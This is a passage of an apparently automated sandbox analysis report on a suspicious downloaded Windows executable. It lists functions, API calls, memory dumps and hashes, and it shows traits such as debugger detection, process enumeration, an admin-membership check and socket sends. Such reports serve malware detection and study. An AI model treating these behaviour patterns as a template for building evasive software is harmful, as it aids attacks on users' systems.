                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcess32$CreateCurrentFirstNextProcessSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177329567-0
                                                                                                            • Opcode ID: e6c7792ee93d0edb22ba165fa61b0d4520e6cbd28bdaf426a2fd4f421b887ab1
                                                                                                            • Instruction ID: f64b4ce1fe07057d26c6700bc7c558641fc6fd4fa539bbeda89eb73a5842076d
                                                                                                            • Opcode Fuzzy Hash: e6c7792ee93d0edb22ba165fa61b0d4520e6cbd28bdaf426a2fd4f421b887ab1
                                                                                                            • Instruction Fuzzy Hash: 39010C74A60208EBDB36DBA4DD8CB9DBBB8BF48701F105598E509A6150D7349F80DB50
                                                                                                            Function 0031C090 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 0031C0AD
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0031C0B4
                                                                                                            • RtlGetVersion.NTDLL(0000011C), ref: 0031C0DA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcVersion
                                                                                                            • String ID: NTDLL$RtlGetVersion
                                                                                                            • API String ID: 3310240892-3678323915
                                                                                                            • Opcode ID: 87d26f354e38e3aadca90afa987e0cfd9c279fd62455059fbf0d821029c2544c
                                                                                                            • Instruction ID: 50515230a898125ef533b96b76b4c6e9d6f29b04abd9c56b3e077ef2cfbf10b7
                                                                                                            • Opcode Fuzzy Hash: 87d26f354e38e3aadca90afa987e0cfd9c279fd62455059fbf0d821029c2544c
                                                                                                            • Instruction Fuzzy Hash: C5F0C074D4521CDBCB359F54EC8DBD9BBB8BB0C315F0001D9A949A2280DB7459E4CF99
                                                                                                            Function 00327FFF Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0032C560
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0032C575
                                                                                                            • UnhandledExceptionFilter.KERNEL32(00338C78), ref: 0032C580
                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0032C59C
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0032C5A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2579439406-0
                                                                                                            • Opcode ID: f16e6303ef5961f26cb29acee504373e2fbad4517d443e9f8073d3ada39ed09b
                                                                                                            • Instruction ID: 571e14ead9eddb0fde35169d9ee782eeba9309415dc70b116662d52de2a07eff
                                                                                                            • Opcode Fuzzy Hash: f16e6303ef5961f26cb29acee504373e2fbad4517d443e9f8073d3ada39ed09b
                                                                                                            • Instruction Fuzzy Hash: 1121C9B48112049FD723EF29FD896583BBCBF58320F50505AE50E9B7A1EBB059C5CB02
                                                                                                            Function 00312AB0 Relevance: 6.2, APIs: 4, Instructions: 229comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitializeEx.COMBASE(00000000,00000000), ref: 00312AE0
                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00312B06
                                                                                                            • CoCreateInstance.OLE32(00337B50,00000000,00000001,00337940,00000000), ref: 00312B21
                                                                                                            • CoUninitialize.COMBASE ref: 00312DDD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 374467530-0
                                                                                                            • Opcode ID: a85bc5ea0d06235928c2b6887f5883171dfc6492d961720be03cafe51a328fb7
                                                                                                            • Instruction ID: da8d26ad14345bbf23c6b33b8aea4966802a29c83e4aba62c54f02ffcf5f7b86
                                                                                                            • Opcode Fuzzy Hash: a85bc5ea0d06235928c2b6887f5883171dfc6492d961720be03cafe51a328fb7
                                                                                                            • Instruction Fuzzy Hash: CFB1C674E00219DFDB59DF98C991B9DFBB1BF48310F208299D519AB391D7306A81CF91
                                                                                                            Function 0031C3A0 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
                                                                                                            • FreeSid.ADVAPI32(?), ref: 0031C409
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: 0a17bf6cffcf66c7108508268b8328230370c6e95c714d7242158a87e51aad48
                                                                                                            • Instruction ID: 0a8b36058cda8decb7debbbc4f9f87c0b0d0bf5514c5f03d4a2cc29a3ee042b1
                                                                                                            • Opcode Fuzzy Hash: 0a17bf6cffcf66c7108508268b8328230370c6e95c714d7242158a87e51aad48
                                                                                                            • Instruction Fuzzy Hash: E501FB34D44348FAEB12DBE8C859BEEBFB8AF18704F0444C8E544AA2C1D7B56684CB91
                                                                                                            Function 003170F2 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0031716A
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 00317187
                                                                                                              • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
                                                                                                            • closesocket.WS2_32(?), ref: 00317193
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale___crtclosesocketsendsetsockopt
                                                                                                            • String ID:
                                                                                                            • API String ID: 1028938620-0
                                                                                                            • Opcode ID: 74e825284d0b4e73bf10b02ac76e9058a477c5521cd7b2807b9224fab047938d
                                                                                                            • Instruction ID: d85a67a98332186b9c76abbf80c7915c08389dfecb3c244880c8ebecd971d9d8
                                                                                                            • Opcode Fuzzy Hash: 74e825284d0b4e73bf10b02ac76e9058a477c5521cd7b2807b9224fab047938d
                                                                                                            • Instruction Fuzzy Hash: B50162B5A04208BBEB15DF90EC85BED7778EF4C710F145518F609AB280E6759A848754
                                                                                                            Function 003170D9 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0031716A
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 00317187
                                                                                                              • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
                                                                                                            • closesocket.WS2_32(?), ref: 00317193
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale___crtclosesocketsendsetsockopt
                                                                                                            • String ID:
                                                                                                            • API String ID: 1028938620-0
                                                                                                            • Opcode ID: acf3b74179d1132b97c3123783de76d131d045ae5621fa023c5c3437219e4648
                                                                                                            • Instruction ID: d85a67a98332186b9c76abbf80c7915c08389dfecb3c244880c8ebecd971d9d8
                                                                                                            • Opcode Fuzzy Hash: acf3b74179d1132b97c3123783de76d131d045ae5621fa023c5c3437219e4648
                                                                                                            • Instruction Fuzzy Hash: B50162B5A04208BBEB15DF90EC85BED7778EF4C710F145518F609AB280E6759A848754
                                                                                                            Function 00305720 Relevance: 4.5, APIs: 3, Instructions: 11memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(0037CB2C,?,00313EE3), ref: 00305728
                                                                                                            • IsWow64Process.KERNEL32(00000000,?,00313EE3), ref: 0030572F
                                                                                                            • GetProcessHeap.KERNEL32(?,00313EE3), ref: 00305735
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentHeapWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 1399170734-0
                                                                                                            • Opcode ID: 199a0d3dc8c68812aca12953dd5d4c0e53c833079a54fe72ca7cfd23e0dd9b43
                                                                                                            • Instruction ID: 308ee7c2d55a76c0f878ee1f5108161bc8518173a4abb45a5e0cb4c932a55b91
                                                                                                            • Opcode Fuzzy Hash: 199a0d3dc8c68812aca12953dd5d4c0e53c833079a54fe72ca7cfd23e0dd9b43
                                                                                                            • Instruction Fuzzy Hash: 88C08C318203049BC31B2BB4FC8EA063BBCFB08791F000026F60DC2230CA779484CBA0
                                                                                                            Function 0031C031 Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
                                                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3989222877-0
                                                                                                            • Opcode ID: 07e5f06e425482b3fe13973f7ea76a49242edffbe043dac290b032cfd91c55ea
                                                                                                            • Instruction ID: 30d8c593bfb26f7116646a791bc2599cbca679fa5664dbc785b4639cb09c8859
                                                                                                            • Opcode Fuzzy Hash: 07e5f06e425482b3fe13973f7ea76a49242edffbe043dac290b032cfd91c55ea
                                                                                                            • Instruction Fuzzy Hash: 0CE01235941208EBCB26CBA4D4487DDB778FB4C305F109184E40962550C3759EC4DB80
                                                                                                            Function 0031C00C Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
                                                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3989222877-0
                                                                                                            • Opcode ID: b76670b376852ff07f2c1b8bbff70bfb770089241045fc379c4ced8ceb480dc8
                                                                                                            • Instruction ID: 30d8c593bfb26f7116646a791bc2599cbca679fa5664dbc785b4639cb09c8859
                                                                                                            • Opcode Fuzzy Hash: b76670b376852ff07f2c1b8bbff70bfb770089241045fc379c4ced8ceb480dc8
                                                                                                            • Instruction Fuzzy Hash: 0CE01235941208EBCB26CBA4D4487DDB778FB4C305F109184E40962550C3759EC4DB80
                                                                                                            Function 0031BFB6 Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
                                                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3989222877-0
                                                                                                            • Opcode ID: 87b7e235672b3f48800384e03a4b7d6b3cf058569c9f761cb5f8cff7d50fbe67
                                                                                                            • Instruction ID: 30d8c593bfb26f7116646a791bc2599cbca679fa5664dbc785b4639cb09c8859
                                                                                                            • Opcode Fuzzy Hash: 87b7e235672b3f48800384e03a4b7d6b3cf058569c9f761cb5f8cff7d50fbe67
                                                                                                            • Instruction Fuzzy Hash: 0CE01235941208EBCB26CBA4D4487DDB778FB4C305F109184E40962550C3759EC4DB80
                                                                                                            Function 0031BFD9 Relevance: 3.0, APIs: 2, Instructions: 16encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
                                                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3989222877-0
                                                                                                            • Opcode ID: d7faf3adcfb3a5929403d1dc16c65357624a6c0f0b8331c956a498ab8c4d1478
                                                                                                            • Instruction ID: 30d8c593bfb26f7116646a791bc2599cbca679fa5664dbc785b4639cb09c8859
                                                                                                            • Opcode Fuzzy Hash: d7faf3adcfb3a5929403d1dc16c65357624a6c0f0b8331c956a498ab8c4d1478
                                                                                                            • Instruction Fuzzy Hash: 0CE01235941208EBCB26CBA4D4487DDB778FB4C305F109184E40962550C3759EC4DB80
                                                                                                            Function 0031F690 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00320790: WSACreateEvent.WS2_32 ref: 00320796
                                                                                                              • Part of subcall function 00320790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
                                                                                                              • Part of subcall function 00320790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
                                                                                                              • Part of subcall function 00320790: WSACloseEvent.WS2_32(00000000), ref: 00320800
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0031F6EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 3201519519-0
                                                                                                            • Opcode ID: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                                                            • Instruction ID: 0369fd50d3347988df83721a07bc235998e90319ebed04f3ae30e5ebfafa8f12
                                                                                                            • Opcode Fuzzy Hash: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                                                            • Instruction Fuzzy Hash: A721C9B5D00209EFCB09DF98C894AEEB7B5FF48344F108559E825A7381D7349A51CF90
                                                                                                            Function 0031F730 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00320870: WSACreateEvent.WS2_32 ref: 00320876
                                                                                                              • Part of subcall function 00320870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
